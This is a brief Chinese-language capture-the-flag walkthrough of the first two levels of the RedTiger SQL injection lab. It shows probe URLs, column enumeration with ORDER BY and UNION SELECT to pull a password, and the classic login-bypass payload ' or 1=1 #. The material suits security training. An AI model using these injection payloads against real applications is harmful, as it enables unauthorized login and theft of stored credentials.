level1
level1打开界面如下图
通过http://redtiger.labs.overthewire.org/level1.php?cat=1 ’
http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=1
http://redtiger.labs.overthewire.org/level1.php?cat=1 and 1=2
测试,发现这是一个数字型sql注入漏洞
知道存在漏洞后,我们通过order by判断数据表的列数
这个可以使用二分法判断数值
测试得出数据表的位数为4
通过union select判断回显位(要求:所有查询中的列数必须相同,数据类型必须兼容)
可以判断出会显得只有三、四列
我们尝试将第三列数值修改为password
得到password,根据给定的用户名,成功登录
level2
猜测使用万能密码
sql语句可能为
select * from user where username=‘username’ and password = ‘password’
构造一个万能账号和密码
‘ or 1=1 #
‘ or 1=1 #
‘ 是为了跟username第一个’构成闭合,然后使用or 1=1 构成恒真语句
#将后面注释掉
成功登录